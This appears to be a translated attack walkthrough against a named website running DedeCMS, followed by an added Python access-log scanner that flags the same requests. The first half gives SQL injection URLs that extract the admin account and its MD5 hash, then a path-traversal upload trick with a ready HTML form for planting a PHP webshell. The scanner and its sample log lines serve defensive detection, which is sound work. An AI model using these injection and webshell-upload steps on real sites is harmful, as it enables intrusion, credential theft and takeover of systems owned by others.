① Injection vulnerability.
Target site: http://www.political-security.com/
First, visit the "/data/admin/ver.txt" page to get the system's last upgrade time;
www.political-security.com/data/mysql_error_trace.inc reveals the admin backend path.
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as the screenshot shows, the vulnerability is present.
Then write in the statement.
View the admin account:
http://www.political-security.co ... &membergroup=@`

admin

View the admin password:
http://www.political-security.co ... &membergroup=@`
8d29b1ef9f8c5a5af429

What you get is 19 characters; drop the first three and the last one to get the admin's 16-character MD5:
8d2
9b1ef9f8c5a5af42
9

cmd5 couldn't crack it, so I had to try the second method.

② Upload vulnerability:

Just log in to the member center, then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"
As the screenshot shows, the upload page "/dialog/select_soft_post" has been successfully called through "/plus/carbuyaction.php".
Then change the extension of the PHP one-line webshell to "rar" or similar, and use the submission page upload1.htm:

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
or
and the upload succeeds.
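From the defender's side, both steps in this post leave distinctive traces in the web server access log: a non-numeric `membergroup` value on `ajax_membergroup.php`, a `rs[code]` value on `carbuyaction.php` that contains a path instead of a short code, and probes of `ver.txt` / `mysql_error_trace.inc`. The script below is an added example, not code from the post or from DedeCMS; it assumes the common Apache/nginx combined log format, and the log lines are constructed samples that copy the request shapes described above plus benign traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format request line (constructed assumption about the log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Reconnaissance paths used in the post (version file, error trace that leaks the backend dir).
DISCLOSURE_PATHS = {"/data/admin/ver.txt", "/data/mysql_error_trace.inc"}

# A legitimate payment code in rs[code] is a short alphanumeric token; anything else is suspect.
CODE_RE = re.compile(r"[A-Za-z0-9_]+")

# Constructed sample log (not real traffic). The first three 203.0.113.5 requests mirror the
# post's probes; the membergroup=1 check and the /index.php hit are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2013:10:00:01 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2013:10:00:09 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 640
203.0.113.5 - - [01/Jan/2013:10:01:30 +0800] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post HTTP/1.1" 200 1024
203.0.113.5 - - [01/Jan/2013:10:00:20 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 20
203.0.113.5 - - [01/Jan/2013:10:00:25 +0800] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 300
198.51.100.7 - - [01/Jan/2013:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 4096
"""


def analyze_request(method, target):
    """Return the list of detection rule names that fire for one request target."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs also URL-decodes values
    rules = []
    if parts.path in DISCLOSURE_PATHS:
        rules.append("info-disclosure-probe")
    if parts.path.endswith("/member/ajax_membergroup.php"):
        # membergroup is an integer id; any other content means it is being used for injection
        if any(not v.isdigit() for v in params.get("membergroup", [])):
            rules.append("sqli-membergroup")
    if parts.path.endswith("/plus/carbuyaction.php"):
        # rs[code] is used to build an include path; '..' or '/' means a traversal to another script
        if any(CODE_RE.fullmatch(v) is None for v in params.get("rs[code]", [])):
            rules.append("include-traversal")
    return rules


def scan_access_log(text):
    """Parse each log line and return one finding dict per (request, rule) pair."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        for rule in analyze_request(m["method"], m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "rule": rule, "target": m["target"]})
    return findings


def suspicious_ips(findings, threshold=2):
    """Correlate: source addresses with at least `threshold` findings (recon plus exploit)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} {h["rule"]:<22} {h["target"]}')
    print("correlated sources:", sorted(suspicious_ips(hits)))
```

The numeric check on `membergroup` and the alphanumeric check on `rs[code]` are the same constraints the application itself should enforce before using either value; running them over the log lets you find the requests that violated them after the fact, and the per-IP correlation separates a single scanner hit from the full recon-then-exploit sequence shown in the post.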